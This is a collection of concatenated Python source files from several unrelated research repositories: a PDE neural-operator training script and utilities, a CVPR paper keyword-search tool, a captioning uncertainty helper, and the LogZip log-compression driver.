data = torch.load(TRAIN_PATH)
x_train, y_train = data['a'][:ntrain,::sub], data['u'][:ntrain,::sub]
data = torch.load(TEST_PATH)
x_test, y_test = data['a'][-ntest:,::sub], data['u'][-ntest:,::sub]
x_train = x_train.unsqueeze(dim=-1)
x_test = x_test.unsqueeze(dim=-1)
trainset = torch.utils.data.TensorDataset(x_train, y_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)
testset = torch.utils.data.TensorDataset(x_test, y_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False)
model = Burgers(width=width, symbol_act=symbol_act, num_hidden=num_hidden, num_layer=num_layer, net_out=net_out, k_max=k_max).to(device)
if num_gpu> 1:
print("Let's use", num_gpu, "GPUs!")
model = nn.DataParallel(model).cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=wd)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma)
start_epoch = 0
if args.load_path is not None:
model.load_state_dict(torch.load(os.path.join(args.load_path, 'weight.bin')))
checkpoint = torch.load(os.path.join(args.load_path, 'checkpoint.bin'))
optimizer.load_state_dict(checkpoint['optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
start_epoch = checkpoint['epoch']
print("Load previous checkpoints from {}".format(args.load_path))
print("Resume from %d epoch (reamining %d epochs)"%(start_epoch, EPOCHS-start_epoch))
train_rel = []
test_rel = []
pbar = tqdm(total=EPOCHS-start_epoch, file=sys.stdout)
for epoch in range(1+start_epoch, EPOCHS+1):
model.train()
train_l2 = 0
for a, u in trainloader:
optimizer.zero_grad()
a, u = a.to(device), u.to(device)
u_pred = model(a).squeeze()
loss = rel_error(u_pred, u).sum()
loss.backward()
optimizer.step()
l2_full = rel_error(u_pred, u).sum()
train_l2 += loss.item()
train_rel.append(train_l2/ntrain)
model.eval()
with torch.no_grad():
test_l2=0
for a, u in testloader:
optimizer.zero_grad()
a, u = a.to(device), u.to(device)
u_pred = model(a).squeeze()
loss = rel_error(u_pred, u).sum()
test_l2 += loss.item()
test_rel.append(test_l2/ntest)
pbar.set_description("###### Epoch : %d, Loss_train : %.4f, Loss_test : %.4f ######"%(epoch, train_rel[-1], test_rel[-1]))
scheduler.step()
pbar.update()
torch.save(model.state_dict(),os.path.join(PATH, 'weight.bin'))
torch.save({'train_rel':train_rel, 'test_rel':test_rel}, os.path.join(PATH, 'loss.bin'))
torch.save({'epoch':epoch,
'optimizer':optimizer.state_dict(),
'scheduler':scheduler.state_dict()}, os.path.join(PATH, 'checkpoint.bin'))
```
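A quick shape check of the model above, assuming the script is importable as a module (the argparse and training code sit behind the `__main__` guard, so importing it only sets the random seeds); the grid size and hyperparameters here are arbitrary:
```python
import torch
from Burgers_1d import Burgers  # assumed module name for the file above

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Burgers(width=32, symbol_act='gelu', num_layer=2, num_hidden=32,
                net_out=True, k_max=16).to(device)
a = torch.randn(4, 256, 1, device=device)  # 4 initial conditions on a 256-point grid
u = model(a)
print(u.shape)  # torch.Size([4, 256, 1])
```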
#### File: JinY0ung-Shin/PDNO/utils.py
```python
import torch
from torch.fft import *
import numpy as np
import scipy.io
import h5py
import torch.nn as nn
import operator
from functools import reduce
from functools import partial
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
class MatReader(object):
def __init__(self, file_path, to_torch=True, to_cuda=False, to_float=True):
super(MatReader, self).__init__()
self.to_torch = to_torch
self.to_cuda = to_cuda
self.to_float = to_float
self.file_path = file_path
self.data = None
self.old_mat = None
self._load_file()
def _load_file(self):
try:
self.data = scipy.io.loadmat(self.file_path)
self.old_mat = True
except:
self.data = h5py.File(self.file_path)
self.old_mat = False
def load_file(self, file_path):
self.file_path = file_path
self._load_file()
def read_field(self, field):
x = self.data[field]
if not self.old_mat:
x = x[()]
x = np.transpose(x, axes=range(len(x.shape) - 1, -1, -1))
if self.to_float:
x = x.astype(np.float32)
if self.to_torch:
x = torch.from_numpy(x)
if self.to_cuda:
x = x.cuda()
return x
def set_cuda(self, to_cuda):
self.to_cuda = to_cuda
def set_torch(self, to_torch):
self.to_torch = to_torch
def set_float(self, to_float):
self.to_float = to_float
def rfft2_feature(x, n_trun=12):
"""
x : torch.tensor shape of (..., W, W)
"""
w = x.size(-1)
x_feat = rfft2(x)
real, imag = x_feat.real, x_feat.imag
real, imag = real.T[list(range(n_trun)), :], imag.T[list(range(n_trun)), :]
real = real[:, list(range(n_trun)) + list(range(w-1, w-1-n_trun, -1))]
imag = imag[:, list(range(n_trun)) + list(range(w-1, w-1-n_trun, -1))]
return real.T, imag.T
def rel_error(x, _x):
"""
<ARGS>
x : torch.Tensor shape of (B, *)
_x : torch.Tensor shape of (B, *)
<RETURN>
out :torch.Tensor shape of (B), batchwise relative error between x and _x : (||x-_x||_2/||_x||_2)
"""
if len(x.shape)==1:
x = x.reshape(1, -1)
_x = _x.reshape(1, -1)
else:
B = x.size(0)
x, _x = x.reshape(B, -1), _x.reshape(B, -1)
return torch.norm(x - _x, 2, dim=1) / torch.norm(_x, 2, dim=1)
class LpLoss(object):
def __init__(self, d=2, p=2, size_average=True, reduction=True):
super(LpLoss, self).__init__()
#Dimension and Lp-norm type are postive
assert d > 0 and p > 0
self.d = d
self.p = p
self.reduction = reduction
self.size_average = size_average
def abs(self, x, y):
num_examples = x.size()[0]
#Assume uniform mesh
h = 1.0 / (x.size()[1] - 1.0)
all_norms = (h**(self.d/self.p))*torch.norm(x.view(num_examples,-1) - y.view(num_examples,-1), self.p, 1)
if self.reduction:
if self.size_average:
return torch.mean(all_norms)
else:
return torch.sum(all_norms)
return all_norms
def rel(self, x, y):
num_examples = x.size()[0]
diff_norms = torch.norm(x.reshape(num_examples,-1) - y.reshape(num_examples,-1), self.p, 1)
y_norms = torch.norm(y.reshape(num_examples,-1), self.p, 1)
if self.reduction:
if self.size_average:
return torch.mean(diff_norms/y_norms)
else:
return torch.sum(diff_norms/y_norms)
return diff_norms/y_norms
def __call__(self, x, y):
return self.rel(x, y)
# normalization, pointwise gaussian
class UnitGaussianNormalizer(object):
def __init__(self, x, eps=0.00001):
super(UnitGaussianNormalizer, self).__init__()
# x could be in shape of ntrain*n or ntrain*T*n or ntrain*n*T
self.mean = torch.mean(x, 0)
self.std = torch.std(x, 0)
self.eps = eps
def encode(self, x):
x = (x - self.mean) / (self.std + self.eps)
return x
def decode(self, x, sample_idx=None):
if sample_idx is None:
std = self.std + self.eps # n
mean = self.mean
else:
if len(self.mean.shape) == len(sample_idx[0].shape):
std = self.std[sample_idx] + self.eps # batch*n
mean = self.mean[sample_idx]
if len(self.mean.shape) > len(sample_idx[0].shape):
std = self.std[:,sample_idx]+ self.eps # T*batch*n
mean = self.mean[:,sample_idx]
# x is in shape of batch*n or T*batch*n
x = (x * std) + mean
return x
def cuda(self):
self.mean = self.mean.cuda()
self.std = self.std.cuda()
def cpu(self):
self.mean = self.mean.cpu()
self.std = self.std.cpu()
``` |
{
"source": "jiny2001/CVPR_paper_search_tool",
"score": 3
} |
#### File: jiny2001/CVPR_paper_search_tool/find_paper_by_words.py
```python
import argparse
from model.paper2vec import Paper2Vec
parser = argparse.ArgumentParser()
parser.add_argument('keywords', nargs='+', help='keywords for search')
parser.add_argument('-c', '--count', default=5, type=int, nargs='?', help='max num of papers to find')
parser.add_argument('--model_dir', default='data', type=str, nargs='?', help='directory for data')
args = parser.parse_args()
def main(args):
p2v = Paper2Vec(model_dir=args.model_dir)
p2v.load_paper_vectors()
print('\nKeyword(s):', args.keywords)
results = p2v.find_by_keywords(args.keywords, args.count)
if len(results) <= 0:
print('No papers found.')
exit(0)
print('\n%d Papers found ---' % len(results))
for result in results:
# result[0] contains paper id, result[1] contains matching score (larger is better)
print('ID:%d, Score:%d, [ %s ]' % (result[0], result[1], p2v.paper[result[0]].title))
print('Abstract URL:%s' % p2v.paper[result[0]].abstract_url)
print('PDF URL:%s\n' % p2v.paper[result[0]].pdf_url)
if __name__ == '__main__':
main(args)
```
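The same lookup can be done programmatically instead of through the CLI; a hypothetical snippet, assuming trained model files already exist under `data/`:
```python
from model.paper2vec import Paper2Vec

p2v = Paper2Vec(model_dir='data')
p2v.load_paper_vectors()

# Each result is (paper_id, score); a larger score means a better match.
for paper_id, score in p2v.find_by_keywords(['segmentation', 'attention'], 3):
    print(score, p2v.paper[paper_id].title, p2v.paper[paper_id].pdf_url)
```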
#### File: CVPR_paper_search_tool/model/helper.py
```python
import os
import pickle
from collections import Counter
import numpy as np
def make_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
# Read lines into a list of strings.
def read_lines(filename):
with open(filename) as f:
content = f.readlines()
return [x.strip() for x in content]
# Read words into a list of strings.
def read_words(filename):
with open(filename) as f:
words = f.read().split()
return words
def save_object(folder, name, obj):
with open(folder + name + '.pkl', 'wb+') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_object(folder, name):
with open(folder + name + '.pkl', 'rb') as f:
return pickle.load(f)
def merge_dictionary(dict1, dict2):
dict1_counter = Counter(dict1)
dict2_counter = Counter(dict2)
merged_dictionary = dict1_counter + dict2_counter
return dict(merged_dictionary)
def arg_sort(values, count=0, descending=False):
if count <= 0:
count = len(values)
# # use argpartition() to efficiently sort (if np is latest enough)
# if descending:
# indices = np.argpartition(-values, count)
# else:
# indices = np.argpartition(values, count)
# # since indices is not sorted (because of the partial sort), sort again
# new_scores = np.zeros([count], dtype=int)
# for i in range(0, count):
# if descending:
# new_scores[i] = -values[indices[i]]
# else:
# new_scores[i] = values[indices[i]]
#
# new_indices = np.argsort(new_scores)
#
# ids = np.zeros(count, dtype=int)
# for i in range(0, count):
# ids[i] = int(indices[int(new_indices[i])])
if descending:
indices = np.argsort(-values)
else:
indices = np.argsort(values)
ids = np.zeros(count, dtype=int)
for i in range(0, count):
ids[i] = int(indices[i])
return ids
``` |
{
"source": "jiny419/self-critical.pytorch",
"score": 2
} |
#### File: captioning/utils/uncertainty_utils.py
```python
import torch
def get_entropy(probs, dim=-1):
# probs: arbitrary tensor, dimension dim contains the probabilities
return -torch.sum(probs.log() * probs, dim=dim)
def calculate_uncertainties(candidate_probs, candidate_weights):
# candidate_probs: (batch_size, vocab_size, num_candidates)
# calculate average mean prediction
probs = candidate_probs.mul(candidate_weights).div(candidate_weights.sum()).sum(-1)
# total entropy
total = get_entropy(probs) # size: (batch_size,)
# aleatoric part
aleatoric = get_entropy(candidate_probs, dim=1).mul(candidate_weights).div(candidate_weights.sum()).sum(-1)
# epistemic part
epistemic = total - aleatoric
return aleatoric, epistemic
``` |
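A small shape-oriented example of the decomposition above (total predictive entropy = aleatoric + epistemic); the tensors here are random stand-ins for the per-candidate softmax outputs, and the import path is taken from the file header:
```python
import torch
from captioning.utils.uncertainty_utils import calculate_uncertainties, get_entropy

batch_size, vocab_size, num_candidates = 2, 5, 3
candidate_probs = torch.softmax(torch.randn(batch_size, vocab_size, num_candidates), dim=1)
candidate_weights = torch.ones(num_candidates)  # equal weighting of the candidates

aleatoric, epistemic = calculate_uncertainties(candidate_probs, candidate_weights)
total = get_entropy(candidate_probs.mul(candidate_weights)
                    .div(candidate_weights.sum()).sum(-1))
assert torch.allclose(total, aleatoric + epistemic)  # per-example decomposition holds
```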
{
"source": "JinYang88/LogZip",
"score": 2
} |
#### File: src/logzip/logzip.py
```python
import sys
sys.path.append("../logzip/")
import os
import glob
import time
import shutil
import subprocess
from logparser import Drain
def boolean_string(s):
if s not in {'False', 'True'}:
raise ValueError('Not a valid boolean string')
return s == 'True'
def get_FileSize(filePath, unit="kb"):
fsize = os.path.getsize(filePath)
if unit == "mb":
fsize = fsize/float(1024*1024)
if unit == "kb":
fsize = fsize/float(1024)
return round(fsize, 2)
def zip_file(filepath, outdir, log_format, template_file="", n_workers=2,
level=3, lossy=False, top_event=2000, kernel="gz", compress_single=False,
report_file="./report.csv"):
time_start = time.time()
# new tmp dirs
logname = os.path.basename(filepath)
timemark = time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))
tmp_dir = os.path.join(outdir, logname + "_tmp_" + timemark)
print("Tmp files are in {}".format(tmp_dir))
if os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir)
if not os.path.isdir(tmp_dir):
os.makedirs(tmp_dir)
if not template_file:
"""
0. sampling
"""
line_num = subprocess.check_output("wc -l {}".format(filepath), shell=True)
line_num = int(line_num.split()[0])
sample_num = 50000
sample_file_path = filepath + ".sample"
try:
subprocess.check_output("gshuf -n{} {} > {}".format(sample_num, filepath,
sample_file_path), shell=True)
except:
subprocess.check_output("shuf -n{} {} > {}".format(sample_num, filepath,
sample_file_path), shell=True)
"""
1. get template file
"""
st = 0.5 # Similarity threshold
depth = 4 # Depth of all leaf nodes
regex = [
r'blk_(|-)[0-9]+' , # block id
r'(/|)([0-9]+\.){3}[0-9]+(:[0-9]+|)(:|)', # IP
r'(?<=[^A-Za-z0-9])(\-?\+?\d+)(?=[^A-Za-z0-9])|[0-9]+$', # Numbers
]
parse_begin_time = time.time()
parser = Drain.LogParser(log_format, outdir=tmp_dir, depth=depth, st=st, rex=regex)
templates = parser.parse(sample_file_path)
os.remove(sample_file_path)
parse_end_time = time.time()
template_file = os.path.join(tmp_dir, "log_templates.csv")
with open(template_file, "w") as fw:
[fw.write(item+"\n") for item in templates]
print("Parser cost [{:.3f}s]".format(parse_end_time-parse_begin_time))
# split files
kb_per_chunk = int(get_FileSize(filepath) // n_workers) + 1
cmd = "split -b {}k {} {}".format(kb_per_chunk, filepath, os.path.join(tmp_dir, f"{logname}_"))
subprocess.call(cmd, stderr=subprocess.STDOUT, shell=True)
# run subprocesses
processes = []
for idx, file in enumerate(sorted(glob.glob(os.path.join(tmp_dir, f"{logname}_*")))):
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "zipper_longgest.py")
per_tmp_dir = os.path.join(tmp_dir, str(idx))
cmd = ('python {} --file {} --log_format "{}" --level {} --lossy {} --template_file {}'+ \
' --tmp_dir {} --out_dir {} --compress_single {} --n_workers {}') \
.format(script_path, file, log_format, level, lossy, template_file,
per_tmp_dir, per_tmp_dir,
compress_single, n_workers)
print(cmd)
processes.append(subprocess.Popen(cmd, stderr=subprocess.STDOUT, shell=True))
[p.wait() for p in processes]
compressed_size = 0
for idx in range(len(processes)):
sub_outfile = glob.glob(os.path.join(tmp_dir, str(idx), "*logzip*"))[0]
dst = os.path.join(outdir, os.path.basename(sub_outfile) + f".{idx+1}of{len(processes)}")
shutil.move(sub_outfile, dst)
compressed_size += get_FileSize(dst, "mb")
[os.remove(chunk) for chunk in glob.glob(os.path.join(tmp_dir, f"{logname}_*"))]
original_size = get_FileSize(filepath, "mb")
compress_ratio = round(original_size / compressed_size, 2)
time_end = time.time()
total_time_taken = time_end - time_start
firstline = True
if os.path.isfile(report_file):
firstline = False
with open(report_file, "a+") as fw:
if firstline:
fw.write("timemark,logname,original_size,compressed_size,compress_ratio,time_taken,n_workers,compress_single\n")
fw.write(f"{timemark},{logname},{original_size},{compressed_size},{compress_ratio},{total_time_taken},{n_workers},{compress_single}\n")
if __name__ == "__main__":
logfile = "../../logs/HDFS_2k.log" # Raw log file."
outdir = "../../zip_out/" # Output directory, if not exists, it will be created.
log_format = '<Date> <Time> <Pid> <Level> <Component>: <Content>' # Log format to extract fields.
n_workers = 3
level = 3
top_event = 2000
kernel = "gz"
compress_single = True
lossy = True
report_file = "./report.csv"
template_file = ""
zip_file(logfile, outdir, log_format,
template_file=template_file,
n_workers=n_workers,
level=level,
top_event=top_event,
kernel=kernel,
lossy=lossy,
compress_single=compress_single,
report_file=report_file)
``` |